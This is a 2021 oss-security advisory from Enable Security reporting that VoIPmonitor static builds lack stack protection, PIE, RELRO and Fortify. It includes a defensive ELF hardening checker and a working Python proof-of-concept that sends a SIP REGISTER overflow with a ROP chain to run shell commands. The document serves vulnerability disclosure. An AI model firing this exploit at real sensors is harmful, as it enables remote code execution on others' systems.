
List:       oss-security
Subject:    [oss-security] ES2021-04: VoIPmonitor static builds are compiled without any standard memory corruption protection
From:       "Sandro Gauci" <sandro@enablesecurity.com>
Date:       2021-03-15 12:50:26
Message-ID: e835517e-f199-4cae-a9cb-33c89a77c916@www.fastmail.com

# VoIPmonitor static builds are compiled without any standard memory corruption protection

- Fixed versions: N/A
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-04-voipmonitor-staticbuild-memory-corruption-protection
- VoIPmonitor Security Advisory: none
- Tested vulnerable versions: 27.5
- Timeline:
    - Report date: 2021-02-10 & 2021-02-13
    - Enable Security advisory: 2021-03-15

## Description

The binaries available for download at <https://www.voipmonitor.org/download> are built without any memory corruption protection in place. The following is the output of the tool `hardening-check`:

```
hardening-check voipmonitor:
 Position Independent Executable: no, normal executable!
 Stack protected: no, not found!
 Fortify Source functions: unknown, no protectable libc functions used
 Read-only relocations: no, not found!
 Immediate binding: no, not found!
 Stack clash protection: unknown, no -fstack-clash-protection instructions found
 Control flow integrity: unknown, no -fcf-protection instructions found!
```

When stack protection, Fortify Source and the other mechanisms listed above are in place, exploitation of a memory corruption vulnerability normally ends in a program crash rather than remote code execution: a stack canary detects a smashed return address before the function returns, the fortified libc wrappers abort on an oversized copy, and a position-independent executable combined with ASLR deprives an attacker of the fixed addresses that a return-oriented payload relies on. Most modern distribution toolchains build executables with these features enabled by default. When they are absent, attackers may easily exploit memory corruption vulnerabilities, such as buffer overflows, to run arbitrary code. In this advisory we demonstrate how a buffer overflow reported in a separate advisory could be abused to run arbitrary code because of the lack of standard memory corruption protection in the static build releases of VoIPmonitor.
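`hardening-check` (shipped in Debian's devscripts package) derives the verdicts above from the ELF headers and symbol names of the binary. The checker below is an added example written for this page, not code from the advisory, from Enable Security or from VoIPmonitor; it reimplements the same properties directly with `struct` so that the mapping from verdict to build flag is visible: PIE is `e_type == ET_DYN` (`-fPIE -pie`), read-only relocations are a `PT_GNU_RELRO` segment (`-Wl,-z,relro`), immediate binding is `DT_BIND_NOW`/`DF_BIND_NOW`/`DF_1_NOW` in the dynamic section (`-Wl,-z,now`), stack protection is a reference to `__stack_chk_fail` (`-fstack-protector-strong`), Fortify is the presence of the `__*_chk` wrappers (`-D_FORTIFY_SOURCE=2` with optimisation on), and CET is the `endbr64` landing pad (`-fcf-protection`). The function names `check_hardening` and `make_sample_elf` are this example's own; the two ELF images it builds are constructed test input, not loadable programs. Stack-clash protection is not checked here. Note that a fully static, stripped binary has no dynamic section and may have no symbol strings left, so the last three checks can only say "not found" for it, which is also why the advisory output reports "unknown" for Fortify.

```python
import struct
import sys

# ELF constants, as defined in <elf.h>
ET_EXEC = 2
ET_DYN = 3
EM_X86_64 = 62
PT_DYNAMIC = 2
PT_GNU_RELRO = 0x6474E552
DT_NULL = 0
DT_DEBUG = 21
DT_BIND_NOW = 24
DT_FLAGS = 30
DT_FLAGS_1 = 0x6FFFFFFB
DF_BIND_NOW = 0x8
DF_1_NOW = 0x1
ENDBR64 = b"\xf3\x0f\x1e\xfa"  # CET landing pad emitted by -fcf-protection

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # Elf64_Ehdr, 64 bytes
PHDR = struct.Struct("<IIQQQQQQ")          # Elf64_Phdr, 56 bytes
DYN = struct.Struct("<qQ")                 # Elf64_Dyn, 16 bytes

# Names of the fortified libc wrappers that _FORTIFY_SOURCE links in
FORTIFY_MARKERS = (b"__memcpy_chk", b"__strcpy_chk", b"__strcat_chk",
                   b"__sprintf_chk", b"__snprintf_chk", b"__printf_chk",
                   b"__fprintf_chk", b"__read_chk")


def check_hardening(data: bytes) -> dict:
    """Return which of the hardening-check properties an ELF64 image has.

    PIE, RELRO and BIND_NOW are read from the headers.  Stack protector,
    Fortify and CET are string/byte-pattern heuristics over the whole file,
    so a stripped static binary can hide the first two.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("only little-endian ELF64 images are handled")
    hdr = EHDR.unpack_from(data, 0)
    e_type, e_machine, e_phoff = hdr[1], hdr[2], hdr[5]
    e_phentsize, e_phnum = hdr[9], hdr[10]

    relro = False
    dynamic = None
    for i in range(e_phnum):
        p_type, _, p_offset, _, _, p_filesz, _, _ = PHDR.unpack_from(
            data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            relro = True          # linker emitted the -z relro segment
        elif p_type == PT_DYNAMIC:
            dynamic = (p_offset, p_filesz)

    # A fully static executable has no PT_DYNAMIC at all, so RELRO and
    # BIND_NOW come out as "not found", as in the advisory output.
    bind_now = False
    if dynamic is not None:
        off, end = dynamic[0], dynamic[0] + dynamic[1]
        while off + DYN.size <= end:
            tag, val = DYN.unpack_from(data, off)
            off += DYN.size
            if tag == DT_NULL:
                break
            if (tag == DT_BIND_NOW
                    or (tag == DT_FLAGS and val & DF_BIND_NOW)
                    or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                bind_now = True   # -z now: every PLT entry resolved at load

    return {
        "pie": e_type == ET_DYN,
        "stack_protector": b"__stack_chk_fail" in data,
        "fortify": any(m in data for m in FORTIFY_MARKERS),
        "relro": relro,
        "bind_now": bind_now,
        "cet_ibt": (ENDBR64 in data) if e_machine == EM_X86_64 else None,
    }


def make_sample_elf(hardened: bool) -> bytes:
    """Constructed test input: a minimal, non-loadable ELF64 image carrying
    only the headers and tables check_hardening() looks at."""
    phnum = 2 if hardened else 1
    phoff = EHDR.size
    dyn_off = phoff + phnum * PHDR.size
    if hardened:
        dyn = (DYN.pack(DT_FLAGS, DF_BIND_NOW) + DYN.pack(DT_FLAGS_1, DF_1_NOW)
               + DYN.pack(DT_NULL, 0))
        tail = b"\x00__stack_chk_fail\x00__memcpy_chk\x00" + ENDBR64 * 3
    else:
        dyn = DYN.pack(DT_DEBUG, 0) + DYN.pack(DT_NULL, 0)
        tail = b"\x00memcpy\x00strcpy\x00"
    ident = b"\x7fELF\x02\x01\x01" + b"\x00" * 9   # ELF64, little-endian
    ehdr = EHDR.pack(ident, ET_DYN if hardened else ET_EXEC, EM_X86_64, 1,
                     0x1000, phoff, 0, 0, EHDR.size, PHDR.size, phnum, 0, 0, 0)
    phdrs = PHDR.pack(PT_DYNAMIC, 6, dyn_off, dyn_off, dyn_off,
                      len(dyn), len(dyn), 8)
    if hardened:
        phdrs += PHDR.pack(PT_GNU_RELRO, 4, dyn_off, dyn_off, dyn_off,
                           len(dyn), len(dyn), 1)
    return ehdr + phdrs + dyn + tail


if __name__ == "__main__":
    # Usage: python3 elfcheck.py /path/to/voipmonitor
    with open(sys.argv[1], "rb") as f:
        for name, value in check_hardening(f.read()).items():
            print(f"{name:16} {value}")
```

Run against the downloaded `voipmonitor` static binary the first five entries come out False, matching the `hardening-check` output above; the constructed "hardened" image shows what a build with the flags named in the lead-in looks like in the same fields. Treat the string-based checks as hints only: a vendor can strip the symbol table without changing the code, and a positive `cet_ibt` only proves that some `endbr64` bytes exist somewhere in the file.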

The vendor has explained that:

> we are not going to enable the protection in the static builds as the speed is critical on many installations

> Our static build also uses tcmalloc (recommended version) which is required for high packet/second processing as the libc allocator is not fast enough especially on NUMA systems. For high packet/second traffic FORTIFY_SOURCE can introduce a lot of additional CPU cycles. If using custom builds with FORTIFY_SOURCE - they should compare if the sniffer did not introduce higher CPU usage.

While we understand the vendor's position, we are issuing an advisory to ensure that end users can make informed risk-based decisions.

## Impact

The lack of standard memory corruption protection mechanisms means that such vulnerabilities may lead to remote code execution.

## How to reproduce the issue

1. Execute the static build of VoIPmonitor (such as https://www.voipmonitor.org/current-stable-sniffer-static-64bit.tar.gz).
2. Start the live sniffer from the VoIPmonitor GUI or via the manager on port 5029.
3. Execute the following Python program so that VoIPmonitor is able to capture the packet.
4. Observe the payload being executed by the `voipmonitor` process, i.e. the following:
    - the current user is printed due to execution of the `whoami` command
    - `h4x0r was here` is also printed
    - a file has been created at `/tmp/woot`

```python
import socket
import struct

# Host on which the VoIPmonitor static build is sniffing. The packet only
# has to be seen by the sniffer; it does not need to be answered.
target = ('167.71.58.84', 5060)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

payload_size = 32607

# Pad with As up to the offset where the command string has to sit
payload = b'A' * 703
payload_size -= len(payload)

# Write the system() payload (NUL-terminated, as system() expects a C string)
cmd = b'whoami;echo "h4x0r was here";touch /tmp/woot\x00'
payload += cmd
payload_size -= len(cmd)

# Pad some more so that we can overwrite save_packet_sql's function return address
payload += b'A' * payload_size

# Call a ROP gadget that increments the value of the RDI register,
# which will now point to the value set by cmd. Absolute addresses can be
# used because the static build is not a position-independent executable.
payload += struct.pack('<Q', 0x0000000000b222f1)

# Return to system() to execute the value in RDI
payload += struct.pack('<Q', 0xb22fd0)

# Return to exit() to exit gracefully
payload += struct.pack('<Q', 0xf60a20)

# The overflowing data is carried in the Request-URI of a SIP REGISTER
msg = b'REGISTER %s SIP/2.0\r\n' % (payload)
msg += b'Via: SIP/2.0/UDP 192.168.1.132:35393;rport;branch=z9hG4bK-kwtTkrdNAO2Wvw0v\r\n'
msg += b'Max-Forwards: 70\r\n'
msg += b'From: <sip:85861710@demo.sipvicious.pro>;tag=mnq1nKGNZHNUkNOG\r\n'
msg += b'To: <sip:85861710@demo.sipvicious.pro>\r\n'
msg += b'Call-ID: 93X9dNZO2qdcfpdu\r\n'
msg += b'CSeq: 1 REGISTER\r\n'
msg += b'Contact: <sip:85861710@192.168.1.132:35393;transport=udp>\r\n'
msg += b'Expires: 60\r\n'
msg += b'Content-Length: 0\r\n'
msg += b'\r\n'
s.sendto(msg, target)
```

## Solution and recommendations

Users who would like to have standard memory corruption protection for VoIPmonitor should compile the binaries themselves and apply their own upgrades rather than using the upgrade feature from the VoIPmonitor GUI / sensors page.

We recommended the following to the vendor:

> Our recommendation is that standard memory corruption protection be switched on by default in the official binary build of VoIPmonitor. If there are specific requirements for specific systems that require such features to be switched off, then additional binaries should be offered, with adequate documentation of the risks involved.

> Do note that memory corruption vulnerabilities should also be addressed and fixed even if security features, such as Fortify, are used.

## Acknowledgements

Enable Security would like to thank Martin Vit and the developers at VoIPmonitor for the very quick responses and explanations with regards to this security issue.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.


--

    Sandro Gauci, CEO at Enable Security GmbH

    Register of Companies:    AG Charlottenburg HRB 173016 B
    Company HQ:               Neuburger Straße 101 b, 94036 Passau, Germany
    PGP/Encrypted comms:      https://keybase.io/sandrogauci
    Our blog:                 https://www.rtcsec.com
    Other points of contact:  https://enablesecurity.com/#contact-us

